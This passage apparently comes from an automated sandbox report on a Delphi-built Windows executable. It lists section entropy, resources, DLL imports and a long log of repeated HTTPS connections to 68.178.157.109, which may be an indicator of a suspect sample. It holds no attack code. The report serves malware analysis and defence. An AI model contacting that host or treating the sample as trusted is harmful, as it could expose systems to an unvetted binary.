                .reloc0xdf0000x5d9c0x5e009129a8d484f279788dec52206416d034False0.6588680186170213data6.6998872064563395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                .rsrc0xe50000x8eb80x9000c232404f28ae0fa606e21339225abf92False0.3703884548611111data4.927625126869957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_CURSOR0xe5b300x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                RT_CURSOR0xe5c640x134dataEnglishUnited States0.4642857142857143
                RT_CURSOR0xe5d980x134dataEnglishUnited States0.4805194805194805
                RT_CURSOR0xe5ecc0x134dataEnglishUnited States0.38311688311688313
                RT_CURSOR0xe60000x134dataEnglishUnited States0.36038961038961037
                RT_CURSOR0xe61340x134dataEnglishUnited States0.4090909090909091
                RT_CURSOR0xe62680x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                RT_BITMAP0xe639c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                RT_BITMAP0xe656c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                RT_BITMAP0xe67500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                RT_BITMAP0xe69200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                RT_BITMAP0xe6af00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                RT_BITMAP0xe6cc00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                RT_BITMAP0xe6e900x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                RT_BITMAP0xe70600x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                RT_BITMAP0xe72300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                RT_BITMAP0xe74000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                RT_BITMAP0xe75d00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                RT_ICON0xe76b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.5859929078014184
                RT_ICON0xe7b200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.48686679174484054
                RT_ICON0xe8bc80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.4483402489626556
                RT_DIALOG0xeb1700x52data0.7682926829268293
                RT_DIALOG0xeb1c40x52data0.7560975609756098
                RT_STRING0xeb2180x2cdata0.4772727272727273
                RT_STRING0xeb2440x2b4data0.476878612716763
                RT_STRING0xeb4f80xb4data0.6888888888888889
                RT_STRING0xeb5ac0xe8data0.6422413793103449
                RT_STRING0xeb6940x2a8data0.4764705882352941
                RT_STRING0xeb93c0x3e8data0.382
                RT_STRING0xebd240x370data0.4022727272727273
                RT_STRING0xec0940x3ccdata0.33539094650205764
                RT_STRING0xec4600x214data0.49624060150375937
                RT_STRING0xec6740xccdata0.6274509803921569
                RT_STRING0xec7400x194data0.5643564356435643
                RT_STRING0xec8d40x3c4data0.3288381742738589
                RT_STRING0xecc980x338data0.42961165048543687
                RT_STRING0xecfd00x294data0.42424242424242425
                RT_RCDATA0xed2640x10data1.5
                RT_RCDATA0xed2740x264data0.7549019607843137
                RT_RCDATA0xed4d80x13fDelphi compiled form 'TForm1'0.7899686520376176
                RT_GROUP_CURSOR0xed6180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                RT_GROUP_CURSOR0xed62c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                RT_GROUP_CURSOR0xed6400x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0xed6540x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0xed6680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0xed67c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_CURSOR0xed6900x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                RT_GROUP_ICON0xed6a40x30data0.9166666666666666
                RT_VERSION0xed6d40x7e4SysEx File - OctavePlateau0.21782178217821782
                DLLImport
                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumSystemLocalesA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                kernel32.dllSleep
                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampSource PortDest PortSource IPDest IP
                Apr 25, 2024 19:24:16.452321053 CEST49705443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.452357054 CEST4434970568.178.157.109192.168.2.9
                Apr 25, 2024 19:24:16.452441931 CEST49705443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.466036081 CEST49705443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.466097116 CEST4434970568.178.157.109192.168.2.9
                Apr 25, 2024 19:24:16.466150999 CEST49705443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.620860100 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.620908976 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:16.620994091 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.624984026 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:16.625004053 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:17.653841019 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:17.653939962 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:17.659296036 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:17.659306049 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:17.659588099 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:17.704025984 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:17.727924109 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:17.768110991 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.496418953 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.496578932 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.496659040 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.499075890 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.499093056 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.499104977 CEST49706443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.499110937 CEST4434970668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.653682947 CEST49707443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.653739929 CEST4434970768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.653821945 CEST49707443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.654383898 CEST49707443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.654429913 CEST4434970768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.654488087 CEST49707443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.661011934 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.661067009 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:18.661145926 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.661453962 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:18.661465883 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:19.347503901 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:19.347605944 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:19.349174976 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:19.349186897 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:19.349441051 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:19.350840092 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:19.396116972 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.492575884 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.492641926 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.492707968 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.492939949 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.492959023 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.492994070 CEST49708443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.493000031 CEST4434970868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.650041103 CEST49709443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.650088072 CEST4434970968.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.650161982 CEST49709443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.650291920 CEST49709443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.650327921 CEST4434970968.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.650382996 CEST49709443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.656151056 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.656184912 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:20.656337976 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.656610012 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:20.656627893 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:21.334006071 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:21.334845066 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:21.336025953 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:21.336035013 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:21.336321115 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:21.338097095 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:21.384116888 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.495724916 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.495805025 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.495886087 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.496063948 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.496093988 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.496130943 CEST49710443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.496138096 CEST4434971068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.663569927 CEST49711443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.663611889 CEST4434971168.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.663683891 CEST49711443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.667336941 CEST49711443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.671993017 CEST4434971168.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.672060013 CEST49711443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.681777000 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.681797981 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:22.681857109 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.683880091 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:22.683893919 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:23.393101931 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:23.393213987 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:23.394622087 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:23.394633055 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:23.394867897 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:23.396369934 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:23.444118977 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.601567030 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.601744890 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.601830006 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.601936102 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.601936102 CEST49712443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.601989031 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.602015018 CEST4434971268.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.750631094 CEST49713443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.750665903 CEST4434971368.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.750765085 CEST49713443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.750977039 CEST49713443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.751054049 CEST4434971368.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.751149893 CEST49713443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.756392956 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.756433010 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:24.756503105 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.756819010 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:24.756834984 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:25.445837021 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:25.445991993 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:25.447402954 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:25.447412968 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:25.448230982 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:25.449517965 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:25.492113113 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.581921101 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.581990004 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.582075119 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.582207918 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.582226992 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.582237959 CEST49714443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.582243919 CEST4434971468.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.726191044 CEST49715443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.726233959 CEST4434971568.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.726300001 CEST49715443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.726413012 CEST49715443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.726454020 CEST4434971568.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.726502895 CEST49715443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.732026100 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.732048035 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:26.732121944 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.732423067 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:26.732429981 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:27.412583113 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:27.412668943 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:27.413943052 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:27.413954020 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:27.414805889 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:27.415957928 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:27.460112095 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.550719023 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.550800085 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.550862074 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.550921917 CEST49716443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.550942898 CEST4434971668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.701436996 CEST49717443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.701502085 CEST4434971768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.701596975 CEST49717443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.701647043 CEST49717443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.701783895 CEST4434971768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.701844931 CEST49717443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.707307100 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.707350016 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:28.707446098 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.707784891 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:28.707799911 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:29.392805099 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:29.392918110 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:29.397839069 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:29.397850990 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:29.398207903 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:29.399720907 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:29.444119930 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:30.533832073 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:30.533911943 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:30.534001112 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:30.534148932 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:30.534168005 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:30.534183979 CEST49718443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:30.534189939 CEST4434971868.178.157.109192.168.2.9
                Apr 25, 2024 19:24:30.727216005 CEST49719443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:30.727283001 CEST4434971968.178.157.109192.168.2.9
                Apr 25, 2024 19:24:30.727482080 CEST49719443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:31.858551025 CEST49719443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:31.858637094 CEST4434971968.178.157.109192.168.2.9
                Apr 25, 2024 19:24:31.858823061 CEST49719443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:31.896711111 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:31.896756887 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:31.896826029 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:31.897690058 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:31.897722006 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:32.577986002 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:32.578068972 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:32.579659939 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:32.579674959 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:32.580374956 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:32.581780910 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:32.628118038 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.750755072 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.750840902 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.750937939 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.762231112 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.762280941 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.762311935 CEST49720443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.762329102 CEST4434972068.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.902956963 CEST49726443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.903000116 CEST4434972668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.903301001 CEST49726443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.903409958 CEST49726443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.903459072 CEST4434972668.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.903512001 CEST49726443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.908509970 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.908557892 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:33.908658981 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.908983946 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:33.909001112 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:34.586395979 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:34.586472988 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:34.587753057 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:34.587759972 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:34.588005066 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:34.597198963 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:34.644117117 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:35.732393980 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:35.732456923 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:35.732527018 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:35.732671976 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:35.732692003 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:35.732707024 CEST49727443192.168.2.968.178.157.109
                Apr 25, 2024 19:24:35.732712984 CEST4434972768.178.157.109192.168.2.9
                Apr 25, 2024 19:24:35.870677948 CEST49731443192.168.2.968.178.157.109
